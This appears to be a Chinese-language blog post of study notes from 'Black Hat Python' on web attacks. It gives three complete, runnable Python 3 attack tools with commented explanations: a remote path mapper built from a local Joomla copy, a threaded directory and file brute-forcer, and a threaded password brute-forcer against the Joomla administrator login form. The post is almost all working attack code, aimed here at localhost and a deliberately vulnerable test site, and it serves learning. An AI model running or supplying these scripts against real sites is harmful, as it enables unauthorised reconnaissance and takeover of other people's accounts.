Python黑帽子-Web攻击

0xGeekCat · 2020-8-9 · 次阅读


Web应用的安装

import queue
import threading
import os
import urllib.request


threads = 10

target = "http://xxx.xxx.xx.xxx/Joomla"
# 用来下载和解压网站对应的Web应用本地目录

directory = "/Applications/XAMPP/xamppfiles/htdocs/Joomla"
# 列出不重要文件后缀名清单
filters = [".jpg", ".gif", "png", ".css"]

# os.chdir改变当前工作目录到指定的路径
os.chdir(directory)

# 存储试图在远程服务器上定位的文件
web_paths = queue.Queue()

# os.walk遍历本地Web应用目录下的所有文件和目录返回三元组(root,dirs,files)
# root为当前正在遍历的这个文件夹的本身的地址
# dirs为列表,内容是该文件夹中所有目录名字(不包括子目录)
# files为列表,内容是该文件夹中所有文件(不包括子目录)
# 遍历过程中创建目标网站全部文件路径同时将过滤后的文件存入web_paths
for r, d, f, in os.walk("."):
    for files in f:
        remote_path = "%s/%s" % (r, files)
        if remote_path.startswith("."):
            remote_path = remote_path[1:]

        # os.path获取文件属性
        # splitext分割路径,返回路径名和文件扩展名的元组
        if os.path.splitext(files)[1] not in filters:
            web_paths.put(remote_path)


def test_remote():
    while not web_paths.empty():
        path = web_paths.get()
        url = "%s%s" % (target, path)

        # 创建Request对象,将对象传递给urlopen
        request = urllib.request.Request(url)

        try:
            # urlopen返回类文件对象,包含从网站读取到的数据
            response = urllib.request.urlopen(request)

            print("[%d] => %s" % (response.code, path))
            response.close()

        except urllib.request.HTTPError:
            pass


# 加层循环运行速率大大提升,原因不太清楚
for i in range(threads):
    print("Spawning thread: %d" % i)
    t = threading.Thread(target=test_remote)
    t.start()

暴力破解目录和文件位置

import threading
import queue
import urllib
import urllib.request


threads = 50
target_url = "http://testphp.vulnweb.com/"
wordlist_file = "SVNDigger/all.txt"
resume = None
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"


def build_wordlist(wordlist_file):

    with open(wordlist_file, 'r') as f:
        raw_words = f.readlines()

    words = queue.Queue()

    for word in raw_words:
        #  rstrip删除字符串末尾的指定字符(默认为空格)
        word = word.rstrip()

        words.put(word)

    return words


def dir_bruter(word_queue):

    while not word_queue.empty():

        attempt = word_queue.get()
        attempt_list = []

        if "." not in attempt:

            attempt_list.append("/%s/" % attempt)
        else:
            attempt_list.append("/%s" % attempt)

        for brute in attempt_list:

            target_url_format = target_url if target_url[-1] != '/' else target_url[:-1]

            url = "%s%s" % (target_url_format, urllib.request.quote(brute))

            try:
                headers = {"User-Agent": user_agent}
                req = urllib.request.Request(url, headers=headers)
                response = urllib.request.urlopen(req)

                if len(response.read()):
                    print("[%d] => %s" % (response.code, url))

            except:
                pass


word_queue = build_wordlist(wordlist_file)

for i in range(threads):
    t = threading.Thread(target=dir_bruter, args=(word_queue,))
    t.start()

暴力破解HTML认证

import requests
import threading
import queue

from html.parser import HTMLParser

# 简要设置
user_thread = 10
username = "Joolma"
wordlist_file = "cain.txt"

target_url = "http://localhost/Joomla/administrator/index.php"
target_post = "http://localhost/Joomla/administrator/index.php"

username_field = "username"
password_field = "passwd"

cookie = {}
resume = None

success_check = "Control Panel"


class BruteParser(HTMLParser):

    def __init__(self):

        HTMLParser.__init__(self)
        # 用于存储结果的字典
        self.tag_results = {}

    # 调用feed时,将整个HTML文档传递进来并在遇到每个标签时使用handle_starttag
    def handle_starttag(self, tag, attrs):
        if tag == "input":
            tag_name = None
            for name, value in attrs:
                if name == "name":
                    tag_name = value
            if tag_name is not None:
                self.tag_results[ tag_name ] = value


class Bruter(object):

    def __init__(self, username, words):

        self.username = username
        self.password_q = words
        self.found = False

        print("Finished setting up for: %s" % username)
        print("Total %d tries" % self.password_q.qsize())

    def run_bruteforce(self):
        for i in range(user_thread):
            t = threading.Thread(target=self.web_bruter)
            t.start()

    def web_bruter(self):

        response = requests.get(target_url)
        cookie = response.cookies

        # 将原始HTML代码传递给HTML页面解析器
        # feed返回由已获得表单元素组成的字典
        parser = BruteParser()
        parser.feed(response.text)
        post_tags = parser.tag_results

        while not self.password_q.empty() and not self.found:

            brute = self.password_q.get().rstrip().decode("ascii")

            # 暴力破解工具替换用户名和密码
            post_tags[username_field] = self.username
            post_tags[password_field] = brute

            # \r将光标回退到行首,\b回退一格
            print(" \b\b" * 100, end="")
            print("\rTrying: %s : %s (%d left)" % (self.username, brute, self.password_q.qsize()), end="")

            login_response = requests.post(target_post, data=post_tags, cookies=cookie)

            # requests库自动处理跳转
            login_result = login_response.text

            # 查看是否成功认证
            if success_check in login_result:
                self.found = True

                print("\n[*] Bruteforce successful.")
                print("[*] Username: %s" % username)
                print("[*] Password: %s" % brute)
                print("[*] Waiting for other threads to exit...")


def build_wordlist(wordlist_file):

    fd = open(wordlist_file, "rb")
    raw_words = fd.readlines()
    fd.close()

    found_resume = False
    words = queue.Queue()

    for word in raw_words:
        word = word.rstrip()

        if resume is not None:
            if found_resume:
                words.put(word)
            else:
                if word == resume:
                    found_resume = True
                    print("Resuming wordlist from: %s" % resume)

        else:
            words.put(word)

    return words


words = build_wordlist(wordlist_file)

bruter_obj = Bruter(username, words)
bruter_obj.run_bruteforce()